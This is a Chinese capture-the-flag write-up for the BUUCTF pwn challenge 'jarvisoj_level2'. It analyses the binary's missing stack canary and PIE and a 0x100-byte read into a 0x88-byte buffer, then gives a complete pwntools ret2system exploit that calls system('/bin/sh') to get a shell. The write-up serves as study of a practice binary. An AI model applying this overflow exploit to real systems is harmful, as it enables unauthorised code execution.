BUUCT_PWN8 jarvisoj_level2

jarvisoj_level2

查看保护措施:

image.png

canary没有,很好。
栈可执行,这题也可以在栈上写shellcode。
PIE都没开,从IDA看到的地址就是实际加载的地址了。

IDA 静态分析

image.png

vulnerable_function 里面 read 读了 0x100 字节,但是 buf 只有 0x88 字节,缓冲区溢出。

那么思路很简单
image.png

ida 找 '/bin/sh'

image.png

system肯定是有了,可以从符号表中取出地址

image.png

exp:

from pwn import *

r = process("./level2")
elf = ELF("./level2")

sys_addr = elf.symbols['system']
bin_sh_addr = 0x0804A024

payload = b'A'*(0x88+4)
payload += p32(sys_addr)
payload += b'AAAA'
payload += p32(bin_sh_addr)

r.sendline(payload)
r.interactive()

image.png

posted @   toso  阅读(23)  评论(0编辑  收藏  举报
相关博文:
·  mit6.828 - lab1笔记
·  mit6.828笔记 - lab5(下)- Spawn and Shell
·  攻防世界-pwn新手区-level0
·  XCTF-pwn-level0
·  BUUCTF-pwn专题
阅读排行:
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 单元测试从入门到精通
· 上周热点回顾(3.3-3.9)
· winform 绘制太阳,地球,月球 运作规律
点击右上角即可分享
微信分享提示
AI IDE Trae